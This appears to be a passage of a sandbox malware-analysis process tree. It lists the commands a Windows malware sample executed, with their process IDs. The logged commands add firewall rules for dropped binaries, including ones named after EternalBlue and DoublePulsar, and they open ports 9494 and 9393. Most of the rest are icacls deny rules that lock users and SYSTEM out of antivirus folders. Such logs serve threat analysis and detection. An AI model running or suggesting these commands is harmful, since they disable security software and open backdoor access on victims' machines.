  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:4548
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5392
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:2908
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:4168
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:3884
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
  2⤵
  PID:5312
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
  2⤵
  PID:5512
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
  2⤵
  PID:5720
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
  2⤵
  PID:6140
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5172
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
  2⤵
  PID:2692
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5444
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
  2⤵
  PID:5452
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2164
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
  2⤵
  PID:6096
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:5324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
  2⤵
  PID:4824
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:5652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
  2⤵
  PID:5816
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    PID:3840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
  2⤵
  PID:5124
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    PID:5548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5208
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:3484
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5240
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:5196
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5680
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
  2⤵
  PID:4868
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4924
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5312
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:5536
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1080
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:5964
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  PID:2300
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5172
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5544
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5444
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
  2⤵
  PID:3036
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5648
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  PID:5448
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  PID:5568
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:4704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  PID:5624
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:4400
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:5552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:5220
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:6020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4260
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:4540
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4064
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5164
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
  2⤵
  PID:5932
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5496
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1080
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5676
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3408
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4536
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:2540
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4588
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4704
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5832
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1792
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2164
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5704
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1728
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4816
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5160
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5392
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5408
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5700
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6048
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4408
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3484
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:4828
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4900
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:1592
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1464
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5552
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:5856
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1924
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:3500
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5556
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2404
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5212
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5160
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5612
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6092
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5232
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4392
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5536
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4900
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5808
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5788
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5800
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5832
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:4568
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4540
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4548
- C:\Windows\SysWOW64\cmd.exe
